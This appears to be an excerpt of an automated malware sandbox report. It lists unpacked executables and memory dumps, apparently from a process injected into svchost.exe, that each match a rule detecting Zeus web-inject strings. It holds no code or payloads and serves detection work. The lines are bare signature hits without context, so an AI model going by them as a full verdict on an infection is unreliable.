Source: 2.3.svchost.exe.b00000.23.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2d30000.13.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.30.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 0.2.UMwpXhA46R.exe.407000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.42.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.2.svchost.exe.29f3c00.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2d30000.15.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 30.2.PMnAVsjMPucERAKEWNFImySCFHoLk.exe.27a0000.2.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.2.svchost.exe.2cd1c00.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.55.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 33.2.PMnAVsjMPucERAKEWNFImySCFHoLk.exe.2672000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 7.2.PMnAVsjMPucERAKEWNFImySCFHoLk.exe.1040000.2.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 16.2.PMnAVsjMPucERAKEWNFImySCFHoLk.exe.2af2000.1.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.42.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 24.2.PMnAVsjMPucERAKEWNFImySCFHoLk.exe.24f2000.1.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.54.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 19.2.PMnAVsjMPucERAKEWNFImySCFHoLk.exe.2d80000.2.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 21.2.PMnAVsjMPucERAKEWNFImySCFHoLk.exe.2ca0000.2.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 0.2.UMwpXhA46R.exe.406400.1.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 9.2.PMnAVsjMPucERAKEWNFImySCFHoLk.exe.a20000.2.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.2.svchost.exe.407000.1.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.29.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.886000.2.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.51.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.37.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 9.2.PMnAVsjMPucERAKEWNFImySCFHoLk.exe.9c2000.1.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 30.2.PMnAVsjMPucERAKEWNFImySCFHoLk.exe.25f2000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 16.2.PMnAVsjMPucERAKEWNFImySCFHoLk.exe.2b80000.2.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.51.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 24.2.PMnAVsjMPucERAKEWNFImySCFHoLk.exe.2560000.2.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2d30000.18.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.48.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 27.2.PMnAVsjMPucERAKEWNFImySCFHoLk.exe.2e82000.1.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.37.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 0.3.UMwpXhA46R.exe.7081e8.1.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.f380000.11.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.22.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2d30000.9.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2d30000.18.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.27.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.24.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 7.2.PMnAVsjMPucERAKEWNFImySCFHoLk.exe.1040000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 6.2.PMnAVsjMPucERAKEWNFImySCFHoLk.exe.11e2000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.26.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 0.3.UMwpXhA46R.exe.7031e8.2.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.35.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 21.2.PMnAVsjMPucERAKEWNFImySCFHoLk.exe.2ab2000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.54.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.41.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 0.3.UMwpXhA46R.exe.708de8.0.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.3c40000.17.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.35.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2d30000.9.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.25.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.886c00.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.41.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.32.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 36.2.PMnAVsjMPucERAKEWNFImySCFHoLk.exe.1552000.1.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.2.svchost.exe.407000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 27.2.PMnAVsjMPucERAKEWNFImySCFHoLk.exe.3040000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 0.2.UMwpXhA46R.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.31.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.44.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2d30000.15.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.39.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 19.2.PMnAVsjMPucERAKEWNFImySCFHoLk.exe.11d2000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 9.2.PMnAVsjMPucERAKEWNFImySCFHoLk.exe.9c2000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.24.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.19.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.38.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 0.3.UMwpXhA46R.exe.7081e8.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.2.svchost.exe.29a2000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 0.2.UMwpXhA46R.exe.407000.0.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 21.2.PMnAVsjMPucERAKEWNFImySCFHoLk.exe.2ab2000.1.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2d30000.12.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2d30000.7.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 27.2.PMnAVsjMPucERAKEWNFImySCFHoLk.exe.2e82000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.881000.1.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 19.2.PMnAVsjMPucERAKEWNFImySCFHoLk.exe.2d80000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.40.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2a50000.6.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.43.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.48.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.32.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2a50000.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.55.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 39.2.PMnAVsjMPucERAKEWNFImySCFHoLk.exe.d30000.2.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000018.00000002.2707315071.0000000002560000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.2774994198.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.2776615679.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000002.3416553301.00000000029A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000021.00000002.2737098756.0000000002670000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000021.00000002.2735290502.0000000000B00000.00000040.00000010.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000015.00000002.2694402665.0000000002AB0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.2809572996.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.2784640433.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.2575291599.000000000F380000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.2612530811.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.2544138671.000000000D580000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000013.00000002.2647909784.0000000002D80000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.2775654849.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.2587965689.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000002.3402365018.0000000000400000.00000040.00000001.01000000.00000004.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000002.3417374807.0000000002CD1000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.2793511340.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.2763018604.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.2754985393.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000018.00000002.2705436372.00000000024F0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000015.00000002.2699555610.0000000002CA0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000006.00000002.2605884801.00000000011E0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.2786368119.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000000.00000003.2148607507.0000000000703000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 0000001B.00000002.2725518370.0000000002E80000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.2776797358.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.2763556222.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000009.00000002.2610626005.0000000000A20000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.2775373199.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.2522335301.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000010.00000002.2611939403.0000000002AF0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.2519685174.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.2763964877.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000007.00000002.2632861320.0000000000FE0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000027.00000002.2871812715.0000000000CD0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 0000001E.00000002.2759598984.00000000025F0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.2808903395.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.2761135252.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000010.00000002.2612614586.0000000002B80000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.2726433713.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.2633125874.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.2774233552.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.2517359385.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 0000001E.00000002.2785000519.00000000027A0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.2168260986.0000000000881000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000024.00000002.2844886273.0000000001550000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000002.3416553301.00000000029F3000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.2760597306.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.2773682224.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.2649332327.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000013.00000002.2639288300.00000000011D0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 0000000B.00000002.2649599507.0000000003270000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.2776308232.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000007.00000002.2635595118.0000000001040000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.2788341406.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.2809880778.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000024.00000002.2845868580.00000000015B0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.2785726916.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.2787182616.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.2758822752.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.2809200397.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000000.00000002.2153786552.0000000000400000.00000040.00000001.01000000.00000005.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
